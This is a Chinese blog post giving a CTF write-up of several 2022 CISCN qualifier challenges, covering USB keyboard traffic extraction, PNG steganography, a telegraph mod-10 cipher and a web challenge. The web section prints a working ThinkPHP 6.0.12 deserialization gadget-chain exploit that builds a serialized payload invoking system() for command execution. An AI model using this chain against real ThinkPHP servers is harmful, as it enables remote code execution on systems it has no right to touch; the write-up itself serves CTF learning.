[2022CISCN]初赛 复现

最新推荐文章于 2024-05-29 12:33:55 发布
最新推荐文章于 2024-05-29 12:33:55 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: 比赛wp 文章标签: php ctf CTF 安全 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/125564800
版权

ez_usb 

刚开始直接提取usb键盘流量,发现导出有问题

键盘流量,搜索8个字节长度的数据包,这里也能发现版本有2.8.1和2.10.1两种,因此猜测需要分别导出

tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.10.1"' -T fields -e usb.capdata > 2.txt

提取出两段数据 

 然后拿脚本去解键盘流量,分别得到数据如下

output: 526172211a0700Cf907300000d00000000000000c4527424943500300000002A00000002b9f9b0530778b5541d33080020000000666c61672E747874B9Ba013242f3aFC000b092c229d6e994167c05A78708b271fFC042ae3d251e65536F9Ada87c77406b67d0E6316684766a86e844dC81AA2c72c71348d10c43D7B00400700

output :35c535765e50074a

第一个数据用010保存16进制文件,得到一个rar文件

第二个数据就是密码 

 

everlasting_night

仔细观察png数据块,通道隐藏的数据可以配合lsb隐写

PNG文件尾后面的16进制数据,是md5  

ohhWh04m1 

stegslove打开翻通道,A2通道有信息

 

 f78dcd383f1b574b

lsb隐写脚本可以分离出东西 , f78dcd383f1b574b是密码

 

提取出来out文件,需要密码,就是ohhWh04m1 

解出来是个损坏的png,看wp有个工具gimp

需要重名名为data文件

gimp flag.data

签到电台

在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。
发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。
(如果您还需要进一步的提示,可在本公众号输入“豪密剖析”获取。)
“弼时安全到达了”所对应的7个电码:1732 2514 1344 0356 0451 6671 0055
模十算法示例:1732与6378得到7000
发包示例:/send?msg=s 

a = '99643341808268586836775501600817585713493257766561476063601867596343105374607456471099628834298182339040868150740' \
     '9511612238587443601660278684275641000975730184165996600423556460848669900431897229857720894775658109911874842297207211' \
     '874555613481342526489469108931355995699901993003656750839977460316073816952542983844454554912374637487610435202414085664' \
     '59011252194284601222413675885829671754541410117754160428719487295645115327768288544685069742397764022225956726271320557630' \
     '43102657536225660163856239886863333649499474893205993474'[:28]
b = '1732251413440356045166710055'
res = ''
for i in range(28):
    tmp = (int(a[i]) + int(b[i])) % 10
    res += str(tmp)
print(res)

跟据提示脚本算出密文,然后根据session发包

Ezpop 

 

www.zip 源码泄露  

在index.php下的index类中的test方法找到路由

寻找网上的链子 

ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

<?php

namespace think {
    abstract class Model
    {
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = '')
        {
            $this->lazySave = True;
            $this->data = ['whoami' => ['dir /']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami', ['whoami']];
            $this->jsonAssoc = True;
        }
    }
}

namespace think\model {

    use think\Model;

    class Pivot extends Model
    {
    }
}

namespace {
    echo (urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

利用poc生成payload 

然后在正确路径下打 

 修改命令 获得flag

ThnPkm
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2145
2022 CISCN 初赛pwn的完整wp
第15届全国大学生知识竞赛场景实操 2022ciscn线上初赛 部分writeup
Nancy523的博客
05-29 2694
文章目录ez_usbeverlasting_night问卷调查签到电台Ezpop**基于挑战码的双向认证1、2**基于挑战码的双向认证3Iso9798Login-nomalBaby-tree ez_usb 拿到附件wireshark打开 观察 发现流量中存在两种arr 过滤 usb.addr == “2.8.1” && usbhid.data跟usb.addr == “2.10.1” && usbhid.data 分别导出为csv文件 提取hid data 梭哈脚本,
[2022CISCN]ez_usb
Landasika的博客
05-29 1475
[2022ISCN]ez_usb:键盘提取压缩包和密码流量分析 首先题目给的提示是这个是键盘流量,那么我们搜索8个字节长度的数据包,这里发现有两个Destination的数据包的长度是8,说明键盘给两个地方输入了值 tshark分别提取出压缩包和压缩密码 tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt tshark -r ./ez_usb.
[CISCN 2022 初赛]ezpentest
v2ish1yan的博客
07-25 1122
sql注入:盲注、`utf8mb4_bin`字符集的利用、`case when then else end` 的使用 php混淆解密:phpjiami混淆 php反序列化:原生类、`spl_autoload_register`函数、GC垃圾回收机制的利用
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 1761
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1184
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
2019-2022 csp初赛试题
11-24
信息学奥赛初赛 csp认证 2019-2022的真题 noip
2022CSP-J初赛真题
08-03
2022CSP-J初赛真题
csp-J2022初赛答案
10-02
csp-J2022初赛答案 适用于全国的oiers 在重做之后自测
信息学奥赛2022初赛真题
最新发布
05-30
信息学奥赛真题
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1487
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
ciscn 2022 misc 部分wp
zx66661的博客
05-30 1023
everlasting_night 提示是注意png数据块 然后注意图片通道数据可以用来lsb解码 下载是一张图片,尝试几种方法之后没有太大发现 得到提示于是看了一下stegsolve f78dcd383f1b574b 这里发现了一串可疑字符串,题目提示,可以配合lsb隐写,用lsb脚本运行解密 在这里说一句,cloacked-pixel-master要用python2来使用 要下好几个库,慢慢百度吧 Python2 lsb.py extract 图片位置 解出来的位置 密码
[CISCN 2022 初赛]everlasting_night
m0_64444909的博客
03-19 383
对于一张隐写图片,我们要知道正常图片的文件头和文件尾才能发现隐藏在其中的内容PNG:文件头标识:89 50 4E 47文件尾标识:AE 42 60 82这题的图片尾有一串不属于PNG的16进制编码。
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 444
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
PbootCMS后台用户账号密码时进行重置工具
itfans123的博客
05-29 246
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要记得删除该工具,切记!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘记PbootCMS后台用户账号密码时进行重置。
LAMP网络服务架构
2401_83784772的博客
05-27 634
为三种开发动态网页的编程语言,负责解释动态网页文件,负责沟通Web服务器和数据库系统以协同工作,并提供Web应用程序的开发和运行环境。其中PHP是一种被广泛应用的开放源代码的多用途脚本语言,它可以嵌入到HTML中,尤其适合于Web应用开发。作为后端数据库,用于存储网站的业务数据账户信息等,并提供访问接口给编程语言程序连续使用SQL语句进行数据的读写。其中Apache和MySQL的安装并没有严格的顺序。提供网站服务应用的运行环境,也支持Window作为AMP的运行环境。同时提供静态页面的动态页面能力。
HackTheBox-Machines--Popcorn
七天
05-28 547
Popcorn 测试过程。
3.location的写法
u010198709的博客
05-28 408
让服务器接收到请求后,根据需求改写地址,以改写的地址给客户端响应。优先级: =, ^~, ~, ~*, location /nginx通过fastCGI机制调用PHP,处理动态资源。php以fpm的方式运行,有自己独立的进程、服务。将httpd换为nginx,高并发、高性能。作用: 匹配客户端响应。
逆向protobuf
09-11
逆向protobuf是指通过分析已有的序列化代码和.proto文件,来还原出protobuf协议的结构和字段信息的过程。逆向protobuf的目的是为了理解和解析这些结构,以便在逆向工程或其他领域中使用它们。 在逆向protobuf的过程中,可以通过查找url或使用hook的方式来定位.proto文件,然后对其进行分析。通过分析.proto文件,可以还原出protobuf协议中定义的消息结构、字段类型和字段名称等信息。 逆向protobuf的重要性在于可以帮助我们理解和解析使用protobuf协议进行通信的应用程序的数据格式。通过逆向protobuf,我们可以了解到应用程序中使用的消息结构和字段含义,从而可以更好地理解和分析应用程序的工作原理。 逆向protobuf也可以用于反向工程,例如在逆向工程中,我们可以通过逆向protobuf还原出应用程序的数据结构,从而更好地理解应用程序的逻辑和功能。 总而言之,逆向protobuf是一种通过分析序列化代码和.proto文件来还原出protobuf协议的结构和字段信息的过程,它可以帮助我们理解和解析应用程序的数据格式,从而更好地理解和分析应用程序的工作原理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值